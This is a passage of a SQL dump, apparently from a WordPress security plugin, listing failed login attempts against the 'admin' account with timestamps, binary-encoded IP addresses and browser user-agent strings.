Firefox/62.0'),(4164,6838,1629574891.827592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�o}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4165,6839,1629575253.749331,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4166,6840,1629575442.434134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4167,6841,1629575449.447728,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4168,6842,1629575453.798367,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4169,6843,1629575604.946170,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4170,6844,1629575767.857155,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4171,6845,1629576058.177556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4172,6846,1629576336.066657,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4173,6847,1629576625.510888,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4174,6848,1629576799.099038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4175,6849,1629576912.140444,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4176,6849,1629576912.193214,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4177,6850,1629577193.071347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4178,6851,1629577502.770425,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4179,6852,1629577785.736401,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4180,6853,1629577989.243824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(4181,6854,1629578099.067369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\r�>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4182,6855,1629578413.768027,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4183,6856,1629578724.677475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4184,6857,1629579046.910110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4185,6858,1629579175.428902,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(4186,6859,1629579250.028559,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4187,6860,1629579252.476571,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4188,6861,1629579254.598953,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4189,6862,1629579354.807995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4190,6863,1629579648.322110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@tA','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4191,6864,1629579965.738990,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4192,6865,1629580321.412974,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4193,6866,1629580362.492307,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(4194,6867,1629580618.472087,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4195,6868,1629580933.636781,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4196,6870,1629581565.278672,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ǽ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4197,6871,1629581898.207729,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4198,6878,1629583850.600731,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4199,6879,1629583957.051080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ո]�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(4200,6881,1629584480.941784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4201,6882,1629584848.435840,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4202,6883,1629585178.321309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4203,6884,1629585498.854128,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.ePS','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4204,6885,1629585887.554460,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4205,6888,1629586586.842590,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q٤','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4206,6889,1629586900.029780,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4207,6891,1629587539.190457,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(4208,6893,1629587988.257381,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4209,6894,1629588344.223757,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c\no','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4210,6896,1629588740.511358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4211,6897,1629589087.986043,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����K�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4212,6902,1629590500.539093,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4213,6904,1629591140.438752,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���aD�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4214,6905,1629591239.069972,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4215,6906,1629592340.934381,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4216,6907,1629592626.232845,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4217,6908,1629593009.848809,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4218,6911,1629593783.379235,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4219,6914,1629594729.542710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(4220,6915,1629594906.702185,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4221,6916,1629595304.275023,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4222,6918,1629595921.760909,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4223,6920,1629596450.156766,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4224,6922,1629597110.569937,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4225,6925,1629597977.356148,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4226,6927,1629598348.425827,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4227,6928,1629598774.104134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4228,6928,1629598774.210770,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4229,6929,1629599219.347560,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4230,6933,1629600350.797178,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4231,6934,1629600697.177195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��T��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4232,6936,1629601177.752760,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4233,6940,1629602260.768020,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�O�','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 1.7; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),(4234,6941,1629602773.544134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4235,6942,1629603108.660162,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4236,6943,1629603151.281911,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=o�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4237,6944,1629603592.818880,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4238,6945,1629603962.643473,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@wP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4239,6946,1629604306.276038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(4240,6947,1629604342.996896,1,'loginFailInvalidUsername','cjioqdgnpzl',0,'\0\0\0\0\0\0\0\0\0\0��>�zJ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4241,6948,1629604343.519157,1,'loginFailInvalidUsername','cjioqdgnpzl',0,'\0\0\0\0\0\0\0\0\0\0��>�zJ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4242,6949,1629604343.979102,1,'loginFailInvalidUsername','cjioqdgnpzl',0,'\0\0\0\0\0\0\0\0\0\0��>�zJ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4243,6951,1629604788.400259,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4244,6952,1629604838.855289,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"W#�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(4245,6955,1629605703.079942,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4246,6956,1629605933.501676,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4247,6957,1629606009.454034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4248,6958,1629606178.102156,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4249,6959,1629606437.976686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4250,6960,1629606687.289778,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4251,6961,1629606912.123200,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Wb��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4252,6962,1629607149.325550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4253,6963,1629607171.720882,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\Z','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(4254,6964,1629607374.022359,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�ɤ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4255,6965,1629607606.109234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4256,6966,1629607846.761970,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]c8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4257,6967,1629608071.203172,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4258,6968,1629608301.948331,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4259,6969,1629608552.049495,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4260,6970,1629608747.846861,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gZ�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4261,6971,1629608983.859279,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Qٌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4262,6972,1629609243.157378,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4263,6973,1629609468.076887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(E��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(4264,6974,1629609479.099421,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4265,6975,1629609699.519759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�t2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4266,6976,1629609943.896394,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4267,6977,1629610180.055943,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4268,6978,1629610381.231108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4269,6979,1629610590.558388,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"E','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4270,6980,1629610647.103984,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4271,6981,1629610869.234722,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4272,6982,1629611103.016652,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ȗ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4273,6983,1629611322.636198,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.eշ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4274,6984,1629611565.633598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4275,6985,1629611714.244649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��C','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4276,6986,1629611952.844818,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4277,6988,1629612452.544073,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4278,6989,1629612643.220993,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4279,6990,1629612833.457582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\rKz','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4280,6991,1629612877.292362,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4281,6992,1629613121.755061,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4282,6993,1629613334.236055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϔK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4283,6994,1629613553.964709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.ePS','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4284,6995,1629613809.951691,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4285,6996,1629613949.361169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4286,6997,1629614031.847790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3D(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4287,7014,1629614264.183151,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֣%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4288,7015,1629614495.949859,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gV�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 